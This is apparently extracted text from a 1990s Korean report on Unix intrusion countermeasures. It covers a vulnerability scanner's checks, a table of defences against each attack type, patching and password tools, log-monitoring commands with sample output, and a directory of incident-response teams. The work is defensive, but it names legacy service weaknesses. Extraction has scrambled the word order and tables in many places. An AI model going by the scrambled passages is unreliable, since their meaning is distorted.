한국전산원의 년도 유닉스 시스템 보안 취약성 분석 및 진단에 관한 연구 의 부속물로95 “ ”
에서 개발된 는 시스템 검색과 네트워크 검색으로 나누어진다 현재 과SERI UVchecker . SUN
에서 동작가능하고 를 이용한 를 가지고 있다 그러나 실제 해킹하는 도Solaris Tacl/Tk GUI .
구가 아니라 취약점 진단이 목적인 프로그램이다 검사하는 취약점은 다음과 같다. .
시스템 취약점1)
- rhost
- hosts.equiv
파일의 존재와 모드 검사- autoreply ( )
파일의 존재와 모드 검사- rdist ( )
파일의 존재와 모드 검사- loadmodule ( )
디렉토리 권한 검사- psrace(tmp )
네트워크 취약점2)
검사 실제 공격- tftp :
로 수행되고 있는지 검사만 한다- rexd : rpcinfo -p .
명령을 수행해 본다- rsh : rsh .
를 호출해본다- X server : XopenDisplay() .
이전 버전인지 아닌지 검사한다- sendmail : 8.6.12 .
검사 로 관련 프로그램이 수행되고 있는지 검사- NIS : rpcinfo -p NIS
의 결과를 보고 검사를 결정한다- NFS : showmount -e .
제 장 해킹대응방안3
제 절 대응방안1
해킹 수법별 대응방안1.
다음 표 은 제 장에서 보인 해킹 수법분류에 따라 이에 대한 대응 방안을 요약한< 3-1> 2
것이다
표 해킹 수법별 방지 대책요약< 3-1>
ꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧ수법 분류 해킹 수법 대책
ꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧ사회 공학 관리적인 보안 보안 내규 및 절차 등을,
마련하고 운영한다.
ꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜ개인 도용 크랙
스니핑
패스워드 파일 유출 방지 패, Shadow스워드 안전한 패스워드 지침과 운영,일회용 패스워드 압축 암호 등의, /
이용 탐지 방안Telnet, rlogin sniffing이용
ꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜ호스트 위장 HOME/.rhosts
/etc/hosts.equiv
개인별 허용하지 않을 것.rhost개인의 홈디렉토리 찾아 이를 지울 것절대 허용하지 않을 것수시로 점검하여 없앨 것
ꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜ시스템 취약점 sendmail
Exported NFS
wu-ftp, gopherrlogin, lprnELM autoreply
ridist
binmail/user/bin/passwd
NCSA HTTPNIS/YP
최신 버전을 찾아 설치할 것수시로 점검하고,가능한 프락시를 사용할 것외부 공개 디스크의 올바른 정의절대 쓰기 모드를 허용하지 말 것올바른 최신 버전 설치
를 사용하지 않는다autoreply모드를 으로 바꾼다666패치 버전을 설치한다
비트를 제거한다setuid패치 버전을 설치한다패치 버전이나 옵션 제거를 사용하지 않는다tftp보안 옵션을 사용한다-s
올바른 최신 버전을 설치한다사용하지 않거나 최신 패치 설치
ꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜ해킹 프로그램 SATAN,ISS,
AutoHack,Slammer뒷문, setuidVirus, WormLogic Bomb
오히려 이를 이용 자신의 시스템 점검공격 탐지 분석(Gabriel), Auditing
파일시스템 모니터링 점검네트워크 트래픽 모니터링 점검 파일, ,시스템 점검
ꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜ구조적 문제 IP Spoofing 내부 주소를 가진 외부 트래픽 거부
ꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜ서비스 거부 Mail Storm
ICMP AttackDNS Attack
전자우편 모니터링내부에서는 동적 라우팅 사용 않음
서버의 해킹 방지DNS
ꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜꠜ향후 문제 ? 꾸준히 새로운 정보를 받음
ꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧꠧ
방지 대책의 구현2.
가 시스템 패치. (Patch)
유닉스 시스템에서 알려진 모든 버그와 보안 취약점들을 막는다 항상 과 같은 응. sendmail
용 시스템에서의 취약 요소는 가장 최신의 버전으로 설치하며 시스템의 잘못된 구성이나,
접근 권한 등의 문제점을 바로잡고 자신의 유닉스 업체가 제공하는 패치(Permission Mode)
리스트에 따라 시스템을 안전하게 막는다 가장 빨리 최신 패치 등을 알고 싶다면 온라인으.
로 각종 전자우편 그룹에 가입해두고 최신 정보를 받아 둔다.
- [email protected] :CERT Advisory
본문에[email protected], “subscribe"
-Best of Security: [email protected],
본문에, “subscribe best-of-security"
-Firewalls :[email protected],
본문에,“subscribe bugtraq"
본문에-81gm : [email protected], “subscribe 81gm-list"
다 계정 침 패스워드 관리.
보통 유닉스가 제공하는 패스워드 시스템은 에 의해 손쉽게 해독될 수 있다 이 것을Crack .
회피하기 위해서는 암호화된 패스워드가 함께 저장되지 않는 쉐도우패스워드(Shadow
를 운영하야 하며 만약 없다면 공개 도구를 이용할 수 있다 또한 일정기간 이상Password) , .
사용하지 않은 계정에 대해서는 감시하고 있다가 폐쇄시켜야 한다.
새도우 패스워드 패키지-Shadow :
권한의 프로세스를 실행할 때 각 사용자나 스태프들의 업무별로 작업을 통제할-Sudo : root
수 있다.
일정 기간 사용하지 않은 계정 관리-ChkAcct :
다 시스템 점검 및 모니터링.
시스템의 보안 점검과 모니터링을 게을리 하지 않는다 이를 위해 일일 점검표 주간 점검표. ,
등의 체크리스트를 운영하는 것이 좋으며 이를 위해 공개 도구들을 이용할 수 있다, .
유닉스 시스템의 전반적인 보안문제점들 보고- COPS, TIGER :
중요한 파일 시스템의 변경 유무를 안전하게 보관 저장하는 도구이다 특히- TRIPWIRE : .
개 종류의 체크썸을 제공하므로 해커들의 뒷문 프로그램 트로이 목마 삽입 커널 수정 등8 , ,
에 대비할 수 있다.
라 감사 기록.
침입자의 침입 유무를 항상 점검한다 등의 결과나 등에서. Watcher, Swatch, COPS syslog
제공하는 로그나 로 보내지는 시스템 메시지들에 대해 항상 주의하여 모니터링하고 이root
에 대한 대비를 세운다.
마 시스템 공격을 통한 안전 점검.
자신의 유닉스 시스템이나 네트워크가 안전한지 침입자의 입장에서 주기적으로 공격해 보는
것을 게을리 하지 않는다 다음 도구들을 이용한다. .
-ISS(Internet Security Scanner),
-SATAN(System Administrator's Tool for Analyzing Network)
바 사고 시 처리 지침 마련.
열거한 여러 가지 방법이 잘 구현되어 있다 하더라도 뛰어난 침입자에 의해 자신의 시스템
이 침입자에게 노출 당할 수 있다 이런 경우를 대비하여 에 가입하여 외부 기관자의. KISA
협조 체제를 마련하고 또한 피해의 정도에 따라 어떤 식의 사후 대책을 할 것인지 또 경찰
이나 검찰 등 수사기관과의 연락망을 마련해둔다.
사 침해 탐지 및 추적.
최근 침입 탐지 시스템 에 대한 연구들이 진행되고 있으나 이것(Intrusion Detection System)
들은 주로 해외에서의 연구 사례에 의한 것이며 아직 실용화나 안정된 단계는 아니다 현재, .
간단하게 시스템 관리자들이 주의 깊게 시스템의 비정상적인 현상이나 사용자들의 행위를
잘 모니터링하면서 불법 해킹 등의 침입을 탐지해 낼 수 있다.
먼저 다음의 명령으로 언제 누가 어떻게 이 시스템에 로그인하고 로그아웃했는지 알last
수 있다.
% last | more
ksh ttyqd casaturn.kaist.a Thu Mar 16 16:52 still logged in
chkim ttyr9 dal 1.kaist.ac.kr Thu Mar 16 16:50 still logged in
hjha ttyra danso.kaist.ac.kr Thu Mar 16 16:49 - 16:51 (00:01)
hjha ttyra danso.kaist.ac.kr Thu Mar 16 16:47 - 16:47 (00:00)
solee ttyr9 dangun.kaist.ac.kr Thu Mar 16 16:46 - 16:46 (00:00)
yjkim ttyr9 gaea.kaist.ac.kr Thu Mar 16 16:44 - 16:50 (00:05)
chkim ttyra dal 1.kaist.ac.kr Thu Mar 16 16:42 - 16:43 (00:01)
drunken ttyra chagal1.kaist.ac.kr Thu Mar 16 16:40 - 16:40 (00:00)
shhong ttyra dbserver.kaist.ac.kr Thu Mar 16 16:39 - 16:39 (00:00)
jhlee ttyra jparadise.kaist.ac.kr Thu Mar 16 16:38 - 16:39 (00:01)
이 기록을 보면서 불법 사용자는 없는지 점검할 수 있다 만약 어떤 사용자가 특정한 시스.
템에서 접근하는데 엉뚱한 시스템에서 들어오지는 않았는지 체크할 수 있을 것이다 만약.
어떤 사용자가 의심스럽다면 다시 한번 명령이나 명령으로 현재 사용하고 있는지 어who w
떤 시스템에서 왔는지 또 어떤 작업이 있는지 알 수 있을 것이다, .
%who
orpheus console jul 16 16:01
root tty01 jul 15 20:25
jason ttyp1 jul 16 15:18 (robot.ocp.com)
devon ttyp2 jul 16 14:25 (next.cambridge.m)
%
위에서 이라는 사용자가 의심스럽다면 그 사용자가 들어온 시스템에 대해 를joson Finger
아래와 같이 실행하면 현재 사용자 현황을 보여주게 될 것이다 콘솔 이외의 사용자는.
밖에 없으므로 당연히 그가 침입자일 것이고 관리자는 아직 모르고 있을지 모르므wonder
로 전화통화를 통해 계속 추적하는 것이 좋다.
% finger @robot.ocp.com
[rpbot.ocp.cpm]
login name TTY 1dle when Office
olivia Dr.olivia Lason co 12d Sun 11:59
wonder Wonder Hacker p1 Sun 14:33
%
만약 그 사용자가 자신의 시스템에서 무슨 일을 하였는지 알고 싶을 경우에는 이lastcomm
라는 명령을 통해 시스템의 프로세스 수준의 로그를 점검해 본다 이 프로세스 수준의 로그.
는 시스템에 부하를 주고 디스크를 많이 요구하므로 시행하지 않는 경우가 있는데 이를 시,
행시키고 싶다면 관리자가
#/usr/etc/accton/usr/adm/acct
를 실행하여 실행시킨다.
% lastcomm I more
msgs ksh ttyp2 0.03 secs Thu Mar 16 16:58
less ksh ttyp2 0.06 secs Thu Mar 16 16:58
csh F ksh ttyp2 0.00 secs Thu Mar 16 16:58
csh F ksh ttyp2 0.00 secs Thu Mar 16 16:58
date ksh ttyp2 0.02 secs Thu Mar 16 16:58
%
이렇게 로그를 분석하여 침입자 유무를 짐작할 수 있는데 여기에서 시스템의 로그 파일의,
종류를 다음에서 보여 주고 있다.
각 유저마다 가장 최근의 로그인 시간을 기록한다 나 을-/usr/adm/lastlog : . finger someone
사용하여 알 수 있다.
유저가 로그인 할 때마다 시간을 적어둔다-/etc/utmp : .
유저가 로그인 로그 아웃 할 때 시간을 적어둔다 또는-/usr/adm/wtmp : / .last last
명령을 이용하여 내용을 알 수 있다someone .
유저들이 사용하는 명령어를 적어둔다 으로 내용을 알 수 있다-/usr/adm/acct : . lastcomm .
제 절 국내 침해사고대응팀 운영2
한국정보보호센터 기술대응팀1.
가 목표.
전산망 침해사고에 대비한 예방활동 사고 분석 피해복구에 대한 체계를 확립하여 국내 전, ,
산망의 안전 운영 도모
침해사고 예방 및 전산망 보호 기술 지원○
시간 침해사고 접수 및 사고 분석 지원24○
침해사고 피해 복구 및 대응 기술자료 배포○
나 추진 전략.
정보보호센터는 국내 대응팀 활동을 지원하고 전산망 침해사고에 대비한 예방활동 사고,○
분석 피해복구 체제 구축,
를 운영하여 대응 팀으로서 한국을 대표하고CERT-Coordination Center(Korea) , FIRST○
에 가입하여 국내외 정보교환 창구역할 수행
다 침해대응팀협의회 를 구성 운영하며 한국정보보호센터는 사무국 업무를 수. (CONCERT) ,
행
CONCERT : CONsortium of CERTs※
라 전산망 운용기관 전산망보안점검 서비스 제공. (SECONE)
SECONE : Security Emergency of Computers & Online Network Eval;uation※
마 범죄적 해킹사건 분석 및 추적시 검찰 경찰 등 관련기관과 유기적 협조체제 유지. ,
바 세부업무.
기술대응팀1)
침해수법 및 대응기술을 선도적으로 연구 개발하여 국내 기술 지원○
사무국 서비스 운영- CONCERT SECONE
에 가입하여 해외 창구 역할- FIRST
대응팀협의회2) (CONCERT)
국내 대응팀 의 협의회(IRT:INCIDENT Response Team)○
국내 전산망 침해사고 공동 처리 및 협의○
전산망 침해사고 관련 정보 교환○
전산망 침해사고 관련 기술개발 공조체제 구축○
전산망운용기관 보안진단 서비스3) (SECONE)
정보보호센터의 직접적인 기술지원을 받음○
전산망 가입기관 침해대응 기술제공○
전산망 보안 침해사고 조기 탐지 및 대응 지원○
복구 지원 및 피해 확산 방지○
국제적인 침해사고 발생시 국내외 연락 역할과 주요 관련 기관과의 정보 교류 국외4) , IRT
와의 상호연대를 통한 선진기술 습득 가능
유관기관과의 협력5)
대검 정보범죄대책본부 전산망정보범죄 수사협력:○
경찰청 해커수사대 전산망 해킹관련 범죄수사 협력:○
침해사고 대응업무체계6)
침해사고 접수 전 평상시 활동○
각 기관 전산망 보안 문제점 점검 및 예방 기술지원-
침해사고 방지를 위한 각종 자료 제공-
국내 전산망 및 기관별 가입기관 상시연락체계 구축-
전화를 이용한 시간 사고 접수- E-mail, WWW, Fax, 24
사고 접수 발생 활동( )○
침해사고 및 피해 분석-
침입자 추적 및 해결을 위한 공동협조 및 기술 지원-
국내 전산망 및 와 연락 체계 형성- FIRST
침해사고 복구 및 대응기술 개발○
침해사고시 사용된 기술 정 분석 및 대응기술 개발-
피해기관의 복구 기술 지원-
기타 침해사고대응팀 운영2.
가 한국전산원. (NCA)
구성 표준본부대 보안기술팀에 네트웍 기술그룹 시스템 기술그룹 및 위험분석 기술그1) : , ,
룹의 기술분야 중심으로 구성
주요 업무2)
네트웍 기술그룹○
네트웍상의 보안기술 개발 및 보급-
네트웍 침해 대응기술 감지 분석 차단 등 확보- ( . , )
기간전산망 정부기관 사용자의 보안의식 및 대처능력 제고- /
시스템 기술그룹○
유닉스시스템 보안기술 개발 및 보급-
컴퓨터바이러스 백신프로그램 연구 개발-
위험분석 기술그룹○
위험분석 기술확보-
위험관리 기법의 보급-
연혁 및 주요 업적3)
년 월 설립1994 6
나 한국전산망협의회. (KNC)/ IR-Forum
구성1)
명의 의장 개의 사무국 및 개의 실무 소그룹으로 구성1 , 1 2○
소그룹 의사운영위원회로 구성되며 기능을 수행IRT : CERT○
소그룹 에 대한 기술지원IRF- Tech : IRT○
주요 업무2)
간 보안침해정보 공유 및 신속히 효율적으로 대처ISP○
간 보안관련 기술정보의 공유ISP○
등 국제조직참여 및 외국기술의 이전CERT, FIRST○
보안관련 교육 홍보,○
연혁 및 주요 업적3)
년 월 설립1996 3○
다 시스템공학연구소. (SERI) / CERT-KR
구성1)
의장 명 및 개 실무그룹으로 운영(1 ) 3○
전산망 지원 그룹 : Internet Support Group○
국내 인터네트 망 제공자들의 지원 및 권고-
전문가 그룹 : Internet Security Expert Group○
국내 보안전문가 자발참여 그룹으로서 보안문제 해결지원-
운영자 그룹 : Operating Security Group○
주요 업무2)
보안사고의 접수 및 해결 지원○
국제적 보안사고 공조 및 협력○
보안사고 예방 문서서비스○
보안관련 연구개발 지원○
보안관련 정보서비스○
연혁 및 주요 업적3)
년 월 설립1994○
세미나 관련 활동 전문가 초빙강연 회 자체 세미나 정기 워크샵 교육지원등: (11 ), , ,○
한국전산원 과세 유닉스 보안 분석기 개발: (UVChecker)○
라 경찰청 해커 수사대.
구성1)
경찰청 한국인터폴내에 해커수사대로 구성○
팀장 명 분석반 명 연구관 명 및 수사반 명 으로 구성(1 ), (4 ), (1 ) (4 )○
주요 업무2)
보안에 대한 신뢰성 제고○
국내 전산망 및 전산망사용자의 안전을 보호○
국가정보보호 정보화촉진 및 발전 정보서비스 이용의 활성화유도, ,○
보안기술 발전에 능동적으로 참여하여 국가 간 정보우위 점유○
연혁 및 주요 업적3)
년 컴퓨터범죄 담당자 선임 운영’92 “ ”○
년 월 일 해커수사 전담반 으로 확대’95 10 16 “ ”○
년 월 일 해커수사대 발족’96 2 16 “ ”○
국제 해킹사건 건 규명4) 3
유럽 암연구센터 해킹사건 경유(CDK )○
독일 그루너사 해킹사건 원자력연구소 경유( )○
프랑스 남파리대학 해킹사건 선경 경유( )○
국내 해킹사건 건 명 검거5) 3 5
모회사 인터넷망 침투 마비시킨 대학강사등 명’95.10.12 , 2○
모방산업체 인터넷망등 개 전산망 회무단 침해한 부산 고교생’96.1.18 17 272○
일본 교육망등 국내외 개 전산망 침투 해커 명’96.4.18 NTT 92 2○
제 절 해외 침해사고 대응팀과 국제협의체3
해외 침해사고 대응팀1.
가 미국. CERT-CC( )(CERT Coordination Center)
(http://www.cert.org/)
인터넷의 컴퓨터 보안에 관한 정보의 중요센터로서 년에 설립하였으며 다음과 같은 활1988 ,
동을 한다.
는 긴급사태에 대응하여 전산망 기술 지원CERT○
는 사용자 보안의식 사고대응 능력 향상 시스템 평가 보안취약성의 발견 및 보CERT , , ,○
안등을 담당하는 연구기관들의 협력 창구
는 보안 도구에 대한 정보 보안 취약점에 대한 정보 연례보CERT CERT Advisory, , , FAQ,
고 등의 자료를 제공하여 연락처는 다음과 같다.
Email : [email protected]
TEL : 412-268-7090
Fax : 412-268-6989
나 호주. AUSCERT( )(http://www.auscert.org.au)
호주에서 유일하고 신뢰성 있는 인터넷사의 보안기술서비스 접속 점으로 침해사고와 예방기
관의 역할을 담당하고 있는데 의 회원이며 미국 다른 나라의 대응팀, FIRST , CERT, (IRTs)
그리고 호주연방경찰과 협력하고 있다.
호주 는 침해사고 예방 계속적인 피해 위험을 줄이며 네트워크 전문기술과 네트워크CERT , ,
보안에 관련된 기술을 제공하며 침해사고정보들을 수집하며 침해사고를 해결하기 위한 교, ,
류를 지속적으로 수행한다 그리고 시스템의 취약성 방어전략 공격경고 등에 대한 정보를. , ,
수집 분석 관리하고 보안 관련 정보 도구 및 기술의 제공 처로서 활동하고 있다, , , , .
Email : [email protected]
Tel : +61 7 3365 4477
주소 : Australian Computer Emergency Response Team c/- Prentice Centre, The
University of Queensland Brisbane, Queensland, 4072, AUSTRALIA
다 독일. DFN-CERT( )(http://www.cert.dfn.de/eng/)
년에 독일최초로 국가 망의 로서 에 가입하고 있으며 보안사고와 새로운1993 CERT FIRST ,
보안취약성들을 처리하고 접수된 침해사고들을 처리 지원하고 있다 제공정보로서는 유럽의.
정보와 연결 서버 서버 등을 운영한다FIRST WWW , WWW , FTP .
Tel : (+49) 040 / 5494-2262
Fax : (+49) 040 / 5494-2241
Email : [email protected]
라 이태리. CERT-IT( )(http://idea.sec.dsi.unimi.it/cert-it.html)
년 월에 설립되어 이태리의 인터넷상의 사용자 보안 문제를 해결하기 위해 란 대학1994 2
전산과 에서 구성하였는데 미국의 같은 유럽 네트워크의 대응 팀을 만들기 위한, CERT/CC
에 참여하고 있TERENA(Trans European Research Educa-tion Networking Association)
다 이 팀의 목적은 자국 뿐 아니라 전세계적인 협력체제를 구축하여 알려진 침해사고를 분.
석하며 이탈리아 인터넷 사용자를 위하여 보안 점검 분석 정보를 제공하고 다른 들, , CERT
과의 긴 한 협조로 침해사고 자료를 교환하며 사업용 제품의 결함을 경고하기 위하여 소,
프트웨어 생산자와 직접 정보교환을 하고 있다.
이를 위해 튜토리얼 세미나 등을 개최하고 있으며 전자우편그룹으로서, , unix
를 운영하고 있다[email protected] .
Tel : +39 2 55006-391
Fax : +39 2 55006-394
Email : [email protected]
주소 : CERT-IT Dipartmento di Scienze dell'Informazione Via Comelico 39/41, 20135,
Milano
마 네덜란드. CERT-NL( )(http://www.nic.surfnet.nl/surfnet/security/)
의 컴퓨터사고 대응 팀으로 해킹 취약성 바이러스와 관련 있는 컴퓨터 및 네트워SURFnet , ,
크상의 사고를 처리한다 네덜란드의 연구교육망인 의 침해사고 대응 팀으로서 보. SURFnet
안관련 보고서 논문 도구 등을 제공한다BBS, , , , FAQ .
Tel : +31 302 305 305
Fax : +31 302 305 329
Email : [email protected]
주소 : CERT-NL c/o SURFnet by P.O.Box 19035 NL-3501 DA The Netherlands
바 미국. NIST/CSRC( ) (http://cs-www.ncsl.nist.gov/abstract.html)
미국 의 는 컴퓨터보안 관련 정보를 통합NIST CSRC(Computer Security Research Center)
하고 그 정보가 완전하고 정확하도록 보증하며 찾기 쉽고 얻기 쉽도록 하여 제공하고 있, ,
다.
주요 관심은 컴퓨터보안 관련 위협에 대한 정보 취약성 정보 해결책정보를 제공하는데 있, , ,
고 해결센터 는 일반적인 위험 프라이버시 법적 문제 바이러스 보험 정책, (Clearinghouse) , , , , , ,
훈련 등과 같은 다양한 주제들에 대한 컴퓨터 보안 정보의 인덱스를 제공한다 또한. FIRST
와 협력하여 시스템 및 네트워크 관리자가 새로이 알려진 보안 정보를 신속히 제공하는데
주력하고 보안관련 데이터베이스를 만들어 제공하고 있다, .
가 제공하는 정보는 다음과 같다NIST .
보안사고 경보 시스템○
뉴스레터○
다른 컴퓨터 보안 서버 정보○
정책○
보안 툴 정보○
바이러스에 대한 정보○
보안 관련 훈련 서비스○
프라이버시 위험 바이러스 에 대한 포럼을 제공, , -L○
Email : [email protected]
TEL : 301-975-3359
Fax : 301-948-0279
아 미국. PCERT( ) (http://www.cs.purdue.edu/pcert/pcert.html)
(Purdue Computer Emergency Response Team)
보안과 컴퓨터시스템을 강화하려는 대학 내의 사람들을 지원하기 위해 만들어졌으며 컴퓨,
터 보안 사고에 대비하는 대학별 부서간의 연락과 프로토콜을 포함하여 보안문제에 대응하
는 표준을 개발하며 대학 내뿐만이 아니라 외부기관들과 컴퓨터 보안 이슈에 대한 연락처,
로 활용하며 컴퓨터 시스템의 버그 구성에 대한 정보 보안정보 수집 배포 등의 활동을 한, , , /
다.
Email: [email protected]
TEL : 317-494-7844
Fax : 317-494-0739
국제 침해사고 대응 팀 협의회2.
(FIRST : Forum of Incident Response and Security Teams)
미국의 를 중심으로 를 결성하여 각국의 전산망 및 정보 시스템 침해사고의 방NIST FIRST
지를 위한 대응 조치의 일환으로 정부 학계 민간단체 등이 가지고 있는 대응능력을 체계적, ,
으로 연계하고 있다 각국의 침해사고 대응 팀을 구성하여 현재 여 개 기관이 에. 55 FIRST
가입하고 있다.
는 각국의 개별 기관들의 보안에 대한 정보공유 일반적인 문제해결 그리고 앞으로의FIRST ,
전략을 계획하는 등의 일들을 함께 할 수 있는 으로서의 역할을 수행하고 있으며 업Forum ,
체 대학 국가 및 정부기관 그리고 대규모 네트워크를 가진 기업의 사용자들로 구성되고, , ,
있다.
는 또한 비영리 기구로서 년 회 주일 정도의 정기총회와 전자우편그룹 운영으로FIRST , 1 1
정보를 교환하며 정식회원과 및 유관회원들이 참여하는데 조직으로서 운영위원회, , (Steering
연구회 사무국이 있다 회원으로 가입하려면 기존 회원의 추Committee), (Working Groups), .
천과 운영위원회의 찬성 필요하다 는 를 통해 정부 재원을 받다가 년2/3 . FIRST NIST 1996
부터 가입기관의 회비를 받아 운영되고 있다.
의 창립회원은FIRST AFCERT, CERT/CC, DCA/DDN, DART, CIAC, Goddard Space
이며Fllight Center, NCSA ARCCNSRT, SPAN-CERT, NAVCIRT, CSRC, SPAN-France ,
일반회원보다 많은 특전을 가진다.
제 장 해킹방지를 위한 정보보호 기술지침4
제 절 정보보호 방침 수립1
정보보호를 위한 시스템 관리1.
정보보호를 위한 시스템 관리는 어떤 기관내 정보시스템의 위험관리로서 이해해야 한다 어.
떤 기관에서의 보안 대책이란 넓은 의미에서는 하나의 위험관리적인 측면이 있다 여기에는.
마치 시스템 생명주기 와 같이 순환적으로 실행되고 관리되어야 하는 것이다 다(Life Cycle) .
음 순서에 맞게 하나씩 보안관리 및 위험분석을 진행한 후 이를 구현하고 교육과 인지를 통
해 관리하다가 정기적 혹은 비정기적으로 감사 및 사후 관리를 실시하고 적절하게 다시 수
정 발전하게 되는 것이다.
전산망 시스템 보안 목적 및 방침 정책,○
전산망 시스템 보안 요구사항 및 범위 결정○
위험분석 자산분석 위협분석 취약성분석 영향분석 위험분석- , , , ,○
위험평가○
전산망 시스템 보안 계획○
구현 및 인식 교육/○
보안감사 및 사후 관리○
이러한 과정에서 위험분석과 평가를 통해 현재 그 기관의 보안상태현황이 도출되고 이에 대
한 대비책을 세우는데 드는 비용을 포함해서 보안계획이 도출되면 그대로 실해하고 유지하
면 되는데 유지관리 중 보안사고가 발생하거나 감사에 의해 문제점이 발생되면 다시 처음, ,
과정으로 돌아가 수정하게 되는 것이며 위험분석은 그야말로 그 기관이 처한 위험의 정도,
를 평가하는 방법으로서 여러 가지 방법론들이 개발되어 있으나 대체로 자산분석 위협분석, ,
취약성분석 위험분석 위험평가의 가지 단계를 거치는 것으로 이해되고 있다, , 6 .
이 위험 분석의 결과는 정량적이든 정성 적이든 그 기관의 정보시스템 전반적인 보안 상태
가 도출되고 이의 수준을 어느 수준까지 올리느냐에 따라 어떤 대책을 세우고 얼마나 비용,
이 드는가를 알아낼 수 있다.
또는 어떤 기관에서는 위험분석 과정 대신에 기본통제 방법을 사용하기도(Baseline Control)
한다 위험분석에 비해 보다 효율적이며 비용 효과적인 방법으로서 보안을 위해 기본적으로. ,
지켜야할 통제들을 기관의 수준에 따라 여러한 후 이러한 통제가 잘 지켜지는지 아닌지 질
문 표를 통해 하나씩 점검하여 기관의 보안 수준을 평가하고 이에 따라 보안대책을 구현하
는 방법이다.
어떠한 기관도 이러한 방법에 의해 현재의 보안수준을 평가하고 보안관리 방법을 결정하는
것이 좋다 하지만 기관의 여건이나 환경에 따라 보다 상세하고 구체적이며 모든 순서를 다. ,
밟아가며 할 것인가 아니면 보다 간편한 방법으로 할 것인가를 결정하여 나름대로 진행하면
된다.
정보보호 방침2.
정보보호 방침이란 어떠한 조직이 정보시스템 자원을 어떻게 관리 보호할 것인지에 대한,
지침과 규약을 말한다 현재 이러한 정보보호 방침이 대부분의 기관들이 외면하고 있어 보.
안 문제에 대한 근거를 잃고 있다고 본다 이것은 기관 전체의 보안 문제에 대한 근거 및.
절차나 책임소재 등을 명시하여 각 분야에 대한 담당자가 결정되고 그 담당자는 다시 세부
적인 보안 세칙을 마련한 후 이의 결재를 받은 후 그대로 시행하면 되는 것이다.
